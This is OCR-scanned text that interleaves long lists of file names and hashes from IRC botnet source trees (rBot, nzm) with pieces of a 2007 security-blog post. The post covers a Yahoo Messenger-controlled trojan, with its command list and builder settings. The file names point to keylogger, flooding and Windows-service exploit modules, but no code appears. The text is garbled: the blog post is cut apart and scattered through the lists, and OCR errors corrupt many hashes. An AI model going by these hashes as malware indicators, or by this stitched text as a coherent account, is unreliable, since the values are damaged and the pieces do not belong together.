2fe90dd6cac60e88ab6ca3ed83d424d6b 
regcontrol.h 
dbc9b0243d5f43cldad546b5e3bf1c80 
reptile.cpp 
0453a97777e04d2e45fb79bb35f2b8be 
reptile.h 

1e13d2301a263a27b82bf5f0fbae35d7 
resource.h 
04e32b3ee313b0d7c8b0e255250d4dd8 
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secure.cpp 
b33e86824916d682df59d7df5ab35b03 
secure.h 3e5e€65e967be2469a4544b29c9e41654 
service.cpp 
4395519fbd3d301f873c386bec2da638 
service.h 
792e15803e093c9fc96cafaabe7aea20 
socks4.cpp 
535622e9a3898e1c7adc64e3d787168d 
socks4.h fc7e5609a8c08736a10fb15738755a5d 
strings.h 
9426d86d1708df5c0082023b9288a58a 
stub.exe 5d9e0094c47b9de4473bea1d966c4f96 
threads.cpp 
6df12801909bb276ebe64394a0a33be2 
threads.h 
20e0654f03932e19b21dc0b03231ef92 
utility.cpp 
37b6d4fe19722dd4bbb1755d9cflbd0a 
utility.dsp 
39080d4ca4aab2adefb3b6eb87abdb3d 
utility.dsw 
88f091d817d65cd047dd873c631a447c 

utility.h 

8bae67fec2e4cc271e50d9052c6e6724 
utility.ncb 
40453928c628d0celc9b0f8ecl2fe2e2 
utility.opt 
62bf1628592e32896ceda5188e7d1b8e 
utility.plg 
b45dfecef57092e1a7224f152aa92401 
wkssvc.cpp 
7dea8bb0d60402fc4f5fbd6c6ad6ec66 

wkssvc.h 67b56da4edd9ae6caa47ff1d9e530fd6 


nzm.dsp 
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f3c7219e5cc46e6978b3d76b3d19f857 
nzm.dsw 
624ab1d6ccO5f0dbea9068eb6137feec 
nzm.ncb 
1424653c141d2ccf6fe9285990a6ef4f 
nzm.opt 
4a39e99d4a597ab06fa914da95bcb893 
nzm.plg 
25204f45fca4e8d292241f066ba96dbf 
cfg.h 
7d81b6cf008f7ba844f41217cd5cb0d9 
aliaslog.cpp 
831laeea77fa590999ea7cb21c084613d 
autostart.cpp 
€4865d3674e5402dbd98aad4e9241 2ef 
avirus.cpp 
d3a7e0771a691b3aa4653332e8f48773 
crc32.cpp 
eb17deaee053524f4cc29eab31d0bddd 
crypt.cpp 
a5898b8ff50ce3925f5b0d962ea6f3b3 
download.cpp 
27e3d600249fddb7c94ff86bf4fdff36 
driveinfo.cpp 
42e9e4b60b6902e4700979502f16b86a 
ehandler.cpp 
ea5fc7bdfe539b5e6501df39a4059485 
fphost.cpp 
dae10ad7177360d203ab4149bc721c9b 
ident.cpp 
2ed058e643bf25d4a29b0efc93b8265c 
irc send.cpp 
45cc6b478059c28e039d32ebfedb25c8 
loaddlls.cpp 
a5e33dc3ca7e8b5d363aleabc40afd8c 
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misc.cpp 7ec4770962e18a9d65aee4c68af454e2 
net.cpp 
51414aa8fe6f517dce740967fd217460 
netutils.cpp 
0d2b093e763597769bee0297c72d2d01 
nzm.cpp 
6b400265edaca861d1ldeb97eledc69c5 
peer2peer.cpp 
26652dbebf0c798b7700a5316b96c634 
processes.cpp 
d82131dfa0fb50405fecfl7a56653e4a 
random.cpp 
bacda003f928faad42285546c6bbdcf6 
rndnick.cpp 
a2f56fdc8d7c69c9d9d036524760d8b7 
session.cpp 
d233bcad1lbdb8c3fff3fdbafea714e89 
shellcode.cpp 
02f4a5601laec9d5fla5f2ddd8879ce5f 
sysinfo.cpp 
bOdfb00fécf3be0d7e20f349eae7745a 
threads.cpp 
b0869845e3082465a3ae2ce0e1303b2e 
wildcard.cpp 
5f95acc7fa856262bd5a9bdd05b86c8a 
ddos.cpp 2b42f946f35020a522445ceac03f5916 
icmpflood.cpp 
c0a58537d3b37b433f9cla75dbfddabb 
pingudp.cpp 
bb40f66ebfdebla73acd6b4dda87bbcd 
supersyn.cpp 
a7664145a202dee4c9c6b98f8f53ee73 
synflood.cpp 
99147203945509439f917b663a3b0528 
tcpflood.cpp 
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c19462abed0023521f07abf908adfOFf9 
tcpflood2.cpp 
al866488bf0b2de298b4b75cea74378f 
clsass.cpp 
b5481f45acac847d6cc4c636e71079de 
dcass.cpp 
21be53bdef645af48fob224ba99a4a89 
dcom.cpp ela6blf7dbel7ec9f0c63c5033e22e45 
Isass.cpp 
8da03139779d188448ba5323e051ef5d 
Isassllsass.cpp 
5a0771481b9a90ac6a4bd26fcee91f3d 
mssql.cpp 
f82b632936c51b616fddal23645e31acf 
mssqllsass.cpp 
c07cac3d7f400da3c0854a5f79806b69 
realcast.cpp 
70f3f87ef679829e33f2ae98b63bbd9e 
wins.cpp 42a267c014db4a1fb95240acde5a9887 
wkssvc.cpp 
2f837143d6d22fac428a8689c727436f 
capture.cpp 
6e06ebc6f2215300a87088ae182b9ced 
cdkeys.cpp 
1752a34e6d7d986bb918f83ceca23035 
dcc.cpp 
f5d3ef06222bef48e244c797a17c27c9 
findfile.cpp 
79f2afl49eeab89a4f527bf664fb990d 
findpass.cpp 
133c8405971cf9a94613d6efa68f3a48 
httpd.cpp 
6d2969ed87ca82a39c8c45cc795b99e7 
keylogger.cpp 
603598b63bed71e4b7ef6ébba9f0203b2 
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3.11 November 


3.11.1 Yahoo Messenger Controlled Malware (2007-11-02 13:16) 


=(o1 x) 
(&) ca «86ST ir a SB © 

— Webcam Games = Send File Photos Conference 

2) 2 


/help 
Command Listing 

éCmd - Executes DOS Commands. Ex: fermd dir C:\*.txt 
‘Time - Displays the Current System Date & Time 
fscreenshot - Takes Screenshot from Remote PC 
fCloseCD - Closes the CD-ROM Drive Door 
fEjectCD - Ejects the CD-ROM Drive 
‘download - Downloads a specified file from Web 

cmd ver 


Microsoft Windows [Version 5.2.3790] 
(@) has signed back in. (2006/03/16 10:34 AM) 


fernd dir D:\windows\".txt 
: Volume in drive D is D 
Volume Serial Number is 1494-0440 


Directory of d:\windows 


02/02/2006 12:37 PM 52,576 ntbtlog.txt 
12/14/2005 05:03 AM 1,178 OEWABLog.txt 
12/14/2005 04:26 AM 660 428 setuplog.txt 
02/05/2006 05:42 PM O wplog.txt 


4File(s) 714,182 bytes 
O Dir(s) 8,140 832,769 bytes free 


3S T th & vironment 


Change 


display image 


Last message received on 2006/03/16 at 10:34 AM 


IM me a command, master. In the spirit of a previoust post on [1]DIY Exploit Embedding 
Tools - a Retrospective, here’s a very good example of malicious innovation in action - a trojan 
whose client is an instant messaging application - Yahoo Messenger in this case. Released in 
the middle of 2006, this malware with a nearly 100 % detection rate by anti virus vendors, 
doesn’t need any other client to control the infected PC, but Yahoo Messenger, making it a 
good example of malicious innovation and "creativity" in action. Key points : 


- it’s released by an Iranian group 


- it’s localized in 11 languages, [2]MPack and IcePack are thankfully lacking behind at least so 
far 
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psniff.cpp 
e914f46c0330fa749e8db8d85a61058e 
redirect.cpp 
eOac9cef5ea9f61f41cc3726c3699248 
remotecmd.cpp 
9c07c659b40eabe9f067838d80c40946 
secure.cpp 
adfa79c6426febc878498f0381c5f0fO 
socks4.cpp 
10af0b820c2e09f5c384c786calffef9 

visit.cpp 
60f03c5533af3a0d513986fb389a9e51 
advscan.cpp 
85437c655b20ef9885e4e5529405816b 
scan.cpp 9494dfd268fff82f7c6acc6d66295c96 
ftpd.cpp 328a73baa604alae869990a75ddf662e 
tftpd.cpp 
160e7f4f0642dbc60e679c11bbc07784 
commands.txt 
fb4cc62597ed90b48f36a8d31d21df85 
nzm.jpg 
716d5fcb2cba5a117dc3579e6a57216e 
advscan.h 
69c94ef2c99020746c1e4f3871ef013d 
aliaslog.h 
5190cd5c6b9af768d2f12ec53a33539e 
autostart.h 
a346ce96fba3d146d6db423516453504 
avirus.h 5f7878ec5edf81f7c7374f2c530dff22 
capture.h 
c9b9a98f71e58aa5c95fa7e22def6029 
cdkeys.h eObf3b6a764f23ccf8d8b32a05985038 
clsass.h 8e0336973a1f5842c2d57d4e615e208f 
crc32.h 
8ccb9e857c9cb41f21eb3c493a71413d 
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crypt.h 
e6a525ef1160950005b397926308c750 
dcass.h 
4b1d02dde13f7f25e6b252f9d5fe478e 
dcc.h 
59993ef594caf2cf41a2a49195c78eab 
dcom.h 
9d0c31dla4aacb69f45f9de51617e50b 
ddos.h 
755db82f748d3713e5f5c1756ad930d9 
defines.h 
527d282a470276fc23ce98b6ced5629c 
download.h 
87b2f888818aab05cf88fa4c72b94827 
driveinfo.h 
592244a945306749409db5f7e8236ebb 
ehandler.h 
7e€240b2a256fd7175288bfcb9b3f0afb 
externs.h 
961a933496d0dc6fb51d90a335df84ba 
findfile.h 
e7964ada0bal9576c35caa348a9fled0 
findpass.h 
d6f12ac593da98e6labf82cfb9d7b853 
fphost.h 4e18e2c0e05b3902660684c7d6f52ad8 
ftpd.h 
bee3cc2dd90b09d6002faddd7871d5e2 
ftppot.h 6f23f8b4c2b1684e2028e4f0e2ef033e 
functions.h 
1557ce234058d139a95c1d4675509e85 
globals.h 
23775cbc6968cac7f94add3646c4ad04 
httpd.h 
46539c7bcd1cb4d91fl4ec426aea7459 
icmpflood.h 
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d03b9e0a156caed926e0c6509be75fe2 
ident.h 
b12d04376ddba020bb614b28f643d722 
includes.h 
4ee8aefc93f8611balddc5c87b035ab7 
irc send.h 
94345b8777c46d3f67dfc088b5206190 
keylogger.h 
998e7a3a5b99ab6f893fdd49ea336ff0 
loaddlls.h 
33a51d5702427f1035eef60ccbca289f 
Isass.h 
da704f3106e215af2e1b40eb/7ffle9ef 
Isassllsass.h 
96c25be3a04398fb09a7 6ffd7c21c03b 
misc.h 
8e2b1dfl0fb00d1b0ac04d0b3f2f4943 
mssql.h 
dad3ee87222e56569de606559c6e64de 
mssqllsass.h 
b8e8568851fbe532291b46211cdd930e 
net.h 
e7d2cbe50a915c90c44fbb05c12ddeec 
netutils.h 
045df2759c4c65dd18ee2fda4f2674d1 
nicklist.h 
€267b6bc88d23669d999c9F795c79497 
nzm.h 
92ff8585cf0a5e6dbb6097b30002dd4c 
passwd.h 21ba8469c127a4cc3f96fa939bc5fa5e 
peer2peer.h 
98a87d72f519eb3afle8288f76d3e44f 
pingudp.h 
5f919f9a14b8b68b9640c79d16b259d6 
processes.h 

11465 


95283f0340970a60121daa28ce4e5c86 

psniff.h a83f21a522599efa0206cObf5eceebd9 
random.h bfc43fc76fb94a2bee83e6782a3albad 
realcast.h 
d7al14d60ffeab5efllde39ba64cce2e4 
redirect.h 
91eb59e1991fd1251e389b9942f1a381 
remotecmd.h 
7f6d9972b1e54786539c1df72205be44 
rndnick.h 
96313d83a017a0e87b9dc6664540a3ad 

scan.h 

4d5a41fa21277d1948c4c508c16487el1 
secure.h 8ca61057edab3e221f0981a85e31bebd 
session.h 
2e24eb8c867c37c2e4a083f41179a668 
shares.h d3a002008bd6e81af770acceb9534e42 
shellcode.h 
4ee1152c4ded683eb147c642dd3a044a 
socks4.h 25d729e47f7d550a16c46813c3c35f11 
supersyn.h 
c16fd14001ae1688a2578dca555151f0 
synflood.h 

268bb714d89832a594887 3dfdba0655f 
sysinfo.h 

396a06be63c7eb62b1c04fb9Fffd0667 
tcpflood.h 
c€11f092429b504a9dc56af5e05318d6b 
tcpflood2.h 
00271f68380e76fd220992702fc0a48e 

tcpip.h 

bf069e59cc4841e231a2ac1815c86044 

tftpd.h 

08a46fc3eleea39ac39cfab482287039 
threads.h 
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5c1a437b21e61leecb8e786137456009c 
visit. 
b15ed3d6348b577ce5df3bad37721aff 
wildcard.h 
c141f0f78a8e100094737a65a86f8c6b 
wins.h 
6def08395cad95ac3716b2ed5b2dac61 
wkssvc.h 0924ac6712d68a279b367a198eb25a4a 
nzm.dsp 
a24e6fb2e048aa5c52d7c9b0c2e9074d 
nzm.dsw 
624ab1d6ccO05f0dbea9068eb6137feec 
cfg.h 
372633d56d7e44536bc3ffbblfaa554b 
aliaslog.cpp 
093b4d04c789bf40f6ele170ed2b7bf6 
autostart.cpp 
8887eae4c5fc42db283b7939f3b6e948 
avirus.cpp 
75a5123578629417ac1f839d57b720a8 
crc32.cpp 
af2cead7fba8ea6f20f4def6d0a6e558 
crypt.cpp 
7667edf8f22c27136d81c8087e46e180 
download.cpp 
2cb0fb48b25cadb86755bba23d28ea52 
driveinfo.cpp 
b99ac91d51576025187478b906434e54 
ehandler.cpp 
39bd643063f68abae7188f671445995b 
fphost.cpp 
70299c4d378457bc07fel842c57eadd4 
ident.cpp 
fa33a950319e30c64flaf51d3c69729e 


irc send.cpp 
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4a61d31218cal146fa7c00eb350992873 
loaddlls.cpp 
59435dd135ff7897ecdff9f5ecd4d555 
misc.cpp Of09cb2e4387a780065a4a00e3038b5b 
netutils.cpp 
33f24b89b82457098f86833c160c8d0a 
nzm.cpp 
601dbc6968ee2581ad8801c6a9ef2c35 
peer2peer.cpp 
cdd77508dc2e254638b82bcdc6ae7d59 
processes.cpp 
f678dd8a4b9788b04e49b34dd9c1819c 
random.cpp 
bbcc764d76abe7a4006e1bb91cf2d123 
rndnick.cpp 
feafdd54fcc6c737308cb101adb4872c 
session.cpp 
372f07c5ec9c56b43057ddd2f7256619 
shellcode.cpp 
bdfdadlece01a47c8ff55f0072b7ace8 
sysinfo.cpp 
bb676c9c9a5d4f18b18fc5180eb6e667 
threads.cpp 
429f39faff2108ed718d034e8444a4a5 
wildcard.cpp 
157c1085eb4c86f85f8f43b699c00b94 
ddos.cpp eee1379595e9d7c3f38aa48bca44c3f9 
icmpflood.cpp 
b5ca3b59ea57defaf40ef5110e067382 
pingudp.cpp 
72dd8acdbd8be9e7de88f4922ebcc014 
supersyn.cpp 
421d0378afd73b0079c546d9f56c692b 
synflood.cpp 
d4691f143d5df9afea6bcOcb72bbdf31 
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tcpflood.cpp 
b5f9b9f0b289c409524f4450d433377f 
tcpflood2.cpp 

b2299f1da98d7559fe57 Lad5b8ff38fb 
clsass.cpp 
c9ece2e7adbebffO5ffed6d21f05cc62 
dcass.cpp 
fef82e007beb1cd0840d81eb066ae182 


dcom.cpp 5e558b1627f5bc48c892f996d8946955 


Isass.cpp 
8c3bdb004592d866c3607afa9b9e46c9 
Isassllsass.cpp 
46d99ba12d5cb2955d3e091c771ccfb3 
mssql.cpp 
clfd11d08a1b603a9122064f5eb438ef 
mssqllsass.cpp 
3bf9b8856a6ecb70f3ee012f59ffc8d6 
thcsql.cpp 
880b4b4db2caeebb318e4e58a8d30fb3 
wkssvc.cpp 
15ec5857d2acad5517f926b02cf177c7 
capture.cpp 
868049a88b030930bb3c612155a6eb34 
cdkeys.cpp 
583c8ce2737950d36b8311fcf5906F75 
dcc.cpp 
6a4e6e328d0744db6464b4e04c23dfbf 
findfile.cpp 
f047dd7f0897b75ef19b39637a989907 
findpass.cpp 
Obfecd647a2c07ba89816bb0a1f59dc8 
httpd.cpp 
18243afc86e5b5575501306cd409aebf 
keylogger.cpp 
9e5ebe0e73b9dc3d653cl1c7f7e7d4649 
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net.cpp 
d9bd9b44584545943973f50a0dfb7c54 
psniff.cpp 
1bab315d89439c9b1d98cc5d785a013d 
redirect.cpp 
0e3492bd954f5429effd3d09b8488ebe 
remotecmd.cpp 
8330745f345dd38ffd351le3eb18a612d 
rlogind.cpp 
f852db1255f5e2162065749a94dbaf72 
secure.cpp 
cfce175c6f6éde226f2b21294ba67abac 
socks4.cpp 
96af55c3befe8efc8bd013afd0440a2e 
visit.cpp 
ddfcb4d41e9a621415b3f9cd028ae266 
advscan.cpp 
2adaO0befab84e6a5dccea26c82dbc667 
scan.cpp 9220ac5c2036c6941af52ac5e1b7654d 
ftpd.cpp 9c5ddfal877f7b8e3979e63b40d84634 
tftpd.cpp 
f16628459be95670755cf2718f3745e0 
commands.html 
4156b6604de516b4a7a4b3d84d798b91 
commands.txt 
Obb0cea918c1f798e9541b017450528f 
nzm.jpg 
716d5fcb2cba5a117dc3579e6a57216e 
advscan.h 
€06d51639337d823b68248d13b0c36e6 
aliaslog.h 
f5341d886428a0eb401f647a32338ddf 
autostart.h 
bbd9dda781f433da9623c9760f543ed4 
avirus.h deb3389e93f50bff0b2c76cf1217cc7b 
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capture.h 
€35b4907e38528b05f437e5ce69933ac 
cdkeys.h 730b56dd24b2ff86181dbb101242c44e 
clsass.h 2af62dea3972bfe0d15ed73b156ea019 
crc32.h 

8b2f56ed43da86/7f7f3fffc1c5075a5b 

crypt.h 

5f4e9b8001fc1168b76f97042e143251 

dcass.h 

664dcffb906ae1c9fc33a1f98947bcdc 

dcc.h 

6db8284a540fael4ce1636d59fabe7e5 

dcom.h 

bb3cOa6bdfeb426f5f9590ee55913866 

ddos.h 

7f91c1lec6de55d9784617dcf2f7ce32a 
defines.h 
Oebeb714c1197983d287bf134fae09bc 
download.h 
dd169ec65760b7d5bbb4dc8dde960680 
driveinfo.h 
75fe6e1214a53e087fbf236f039829e3 
ehandler.h 
2141232b9dbdaae36534f62f7727c456 
externs.h 
ada3beaeac5lacb6bd3bf09311663fle 
findfile.h 
c155b52ab50e02f170918a298626e7db 
findpass.h 
ce585c55f4b3aa94bfa2b924f9944938 

fphost.h af18057084187b282c87531026ad49df 
ftpd.h 

d43566612a78c32f784ae2ec9b08df54 

ftppot.h 1c08e751d9eledbadfde0fd401067136 


functions.h 
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72c47ea290672eee963eef0aa3bb0bd4 
globals.h 
e€121f05f3c3c6376301a246989305e13 
httpd.h 
d94d503024928ada325fbb5693f3f085 
icmpflood.h 
d0ff90245e883b14984b0400350657ea 
ident.h 
571f7705e7a53a66be42fd67308ce6e6 
includes.h 
5afe8ca0de331e87e1a9757dd4d31135 
irc _send.h 
6d23ee122a7f77b60ca0e64d60f808a6 
keylogger.h 
735c81f961f9647db7419488f34980d2 
loaddlls.h 
6a75ea2bddc7f34790a4521cf7a0aebb 
Isass.h 
d7dff64f6b074d57ab30ca5d50e01019 
Isassllsass.h 
340887893f11a83917c56294394286e0 
misc.h 
7a3520b0e74e2cflaeclce763f936d7e 
mssql.h 
7552d4476bf89cfd26a6f8bdefflela6 
mssqllsass.h 
ea05e2b36997ae727cb50df7429107c9 
net.h 
5c29c6d0a7e9b67cf52af125f37775c8 
netutils.h 
6e192c07420af9ee3f09154e958f6491 
nicklist.h 
e49e1f7e795f6e66977de5b18ac74a61 
nzm.h 


490300b952f361c856c89ablaae991bd 
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- instead of trying to figure out how to connect to the infected host’s IP behind a now standard 
NAT implementation, the trojan only needs a Yahoo ID to use as a robot ID 


- it’s a great example of how IM applications can be used for both propagation, infection, and 
apparently C &C purposes 


- Edit Server 


Robot Info Send IP Address 
Robot Yahoo! ID: Send Os Name 

Send Computer Name 
Send WinUserName 
Send Victim Yahoo! ID 


Robot Password: 


Admin ID: |sma. programmer 


Send an Offline Message to Admin when Remote PC comes online 
Password Protect 


Password: tess [| Show Password 


Enable Fake Error Message 


Title: Program Error 
Test 
Text! (Server Error in'/' Application, 


Timeout Settings 
Delay for sending long texts: 1500 mSec, Biz 1 


AutoConnect Attempt every: 1 “| Minutes. 


FileName After Install: WinMsgLoaderxP.exe ve 


Server Icon 
Oo Icon @Jpegicon ©)Setupicon ©)Custom Icon 


Hel Build Server 
ee [About | | Build server | 


Program Mode: ©)TestOnYourPC  ©@)Runon Remote PC 


And just when | thought I’ve seen everything in the sense of [3]botnets obtaining their com- 
mands using ICQ whitelists, and [4]storm worm malware waiting for the infected party to au- 
thenticate via CAPTCHA then embedd a link to itself at a forum/blog given it cannot bypass the 
CAPTCHA, [5]malicious parties again innovate with an analogy of [6]reCAPTCHA in the form of 
[7]TROJ CAPTCHAR.A, which is more or less [8]a logical development | mentioned in previous 
posts discussing [9]how are Spammers and Phishers Breaking CAPTCHAs and a specific [10]DIY 
CAPTCHA Breaking Service in question. 


1. http: //ddanchev. blogspot .com/2007/09/diy-exploits—embedding-tools.htm 
2. http: //ddanchev. blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese.htm 


3. http: //ddanchev. blogspot .com/2007/03/botnet-communication-platforms.htm 


5. http: //www.avertlabs.com/research/blog/index . php/2007/11/01/the-captcha-challenge/ 
6. http: //recaptcha.net/learnmore.htm 


passwd.h 99f4c67703ae78011c8c31fb2178ff86 
peer2peer.h 
545091482ecd13190ea19276df0b80f2 
pingudp.h 
8a23d495b2c638faeafa34a754a2b873 
processes.h 
5e27d230d5ea882b7cf958243561829d 

psniff.h cé6ba24f7c82eb34cf5c5cd9749957bd7 
random.h 5fcb127f3c6b88675c35f0a0635e193b 
redirect.h 
775e337bb04b36a75fe475f42f03ac89 
remotecmd.h 
efb3f829a076bcale0333342e9b0ee8F 
rlogind.h 

64f3113f05a97c243c6790cbf5d6c287 
rndnick.h 
89b92e3670cc6043621e1168beb9510d 

scan.h 

494113251c74cf043156fd9bd8106bee 
secure.h fobalcddb3888bc4256371cc65ac805db 
session.h 
e8bfbbab4544152a0caf654f281abf59 

shares.h 1957e0c3f99c0c2119ce09535291dc8f 
shellcode.h 
24046af483fed040549c7966f7315aa2 
socks4.h 7410a37d7b878d9c0120a6146123711d 
supersyn.h 
a03c3ee5a9ae9d4e3573936785a76388 
synflood.h 
5d6d9ccdd6d3506db09be94838ef8b9b 
sysinfo.h 
134e00e00607de5d240189c755f7f598 
tcpflood.h 
58a18063b4ed49132d34f2f241d84213 
tcpflood2.h 
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d459006f50c971227935e51d898eb7c9 
tcpip.h 
c45f47d49e8ef6d50a8dcedaf3cleb4a 
tftpd.h 
adcbf62b081f190785102fb8822614d8 
thcsql.h 4a5d62071b74f2cc9c1f622c2b33ae47 
threads.h 
adc69f2f272e34ebd69b19dff55b3c5b 
visit. 
0f09440ad4ab27d5847ab6a7cb007c77 
wildcard.h 
cac08e7c6f261355e3e7c8ab19a96d63 
wkssvc.h 9ef1502a2af4f9edaal19bd56c811701d 
advscan.cpp 
b3c64afe8c96f470b01580ballde7ba9 
advscan.h 
d5bfa343e80c04d15d6d7b5e9ce92eef 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
70bdd438884ef8a62bd24a7c416303f4 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd3labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 


cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
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configs.h 
4bc1bdd59c427bfa0741e80a8b626166 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
IcdO0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
3ca49af98c833fe3590b145a6133b71e 
download.cpp 
52858b50176c141eb5b78d59991d04ff 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
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7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 

6efOd2ffff7 5a9b4aflbe7159d6fc26e 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b69b3d4234fcbc5da07695ae3483cl1b 
ftpd.cpp e324aff6c71758273cbd995939898b1f 
ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
b3218168996b34988da227a5eble86dc 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f11be33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
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includes.h 
8db21459a1056f75957931bf2efdf320 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc send.h 
30d0176a5e9b6e3e5al9bfb1lfcda444c 
keylogger.cpp 
€569621c990b37affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
a50c8d33ea9013fadd70388bbc46a98e 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
Isass2.cpp 
da0492a87b10a88baa09e7e8330b2a0b 


Isass2.h 17e0f879e4ce5667c271cf2df3d97afO 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 


misc.h 
f035c1642a8e3ff49ff19bb1be316333 
ms04 007 asnl.cpp 
a553fe64a5cd63def06ee5ed1bdaa316 
ms04 007 asnl.h 
c18cb0ec17923a63653974cbfbldlecb 
mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssqI.h 
742394ed531laab2ecc958daf5305723e 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
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b1bb95c11a47aa666acd9a5929861726 
netapisvc.cpp 
f576356d1087c4d002931a1699fb5c14 
netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netutils.cpp 
7¢€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
optix.cpp 
5ab6d1017b7380586127050009bec5a9 

optix.h 

3421ea53b60d9533328808627b869ccc 
passwd.h c300d3b2a40113092a84186424b56079 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.cpp 
6ac678aaef/9bf7b4644c3eeaec45fb1 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

psniff.cpp 
c4eb189f05d2a7ff6e52afeOcdab3bd17 

psniff.h 5eebe93de4e03bf0bb118e35997743a9 
rBot.cpp 03f5d9a592e9f909e64cb3329d018b1c 
rBot.dsp cc2b9fca9ca93b60e7553d7b5a63418c 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 
rBot.ncb 5d56155a0ec38af17f1528885b0d14c1 
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rBot.opt a56a9e76c5d582bebalfe89b51f74988 
rBot.plg ccc787a810cc87b9433bca988adec8d6 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 

35014f60da50aef7b6a7al1 9ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 
dbc479f2720ba03cb946419fbef774e0 
rndnick.cpp 
1a2ca37350424ebc8ece807afa055b72 
rndnick.h 
3cbe632d4ca6f1l52ca2a13bb1561d292 
scan.cpp 66cOcfe5563eb8191fda0d9a6781lacOf 
scan.h 

6236be771c0c88df937f75845a064f12 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
session.h 
5f8c353634b560052a5ebee5ef27ae32 
shellcode.cpp 
b16b4f6éaaf8a8c11822c931dc84f77d4 
shellcode.h 
cal14f267b73bc867b075ca56f524d52e 


socks4.cpp 
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7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h b103f307ffO2cd98fe2bfbecbd19c011 
synflood.cpp 
d860c99e49b7c19e49cb61a21baf0f66b 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
taskhider.cpp 
177cd3592dbc89c7676d4e7b7a5921F4 
taskhider.h 
389c143483d51daec2eb37fdb78744al 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9F 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644F 
tcpflood2.h 
f8307cc6251c3fce249a794314103804 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
917efaff4c87cdc33c518a243ffed787 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
cbe0ba8b50028430092c7f0e78841b71 
threads.h 
f1b57b9f58ff94af8d2adeec8e7839e6 
veritas.cpp 
f6c979e5c15128821ac415d40a264653 
veritas.h 
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1ledc6600327d36f4e0c2089c8fa23e7a 
visit.cpp 
27fb4f513a944ba46a905c796bce0c81 
visit. 
766e4add98e2cb96bd37e87f4d9dfff9 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 


wkssvc.h 40cbf340990988e1214bc77e02d2ad93 


workstation.cpp 
2823dd8a969c824d91329a79385195db 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
nzm.dsp 
f3c7219e5cc46e6978b3d76b3d19f857 
nzm.dsw 
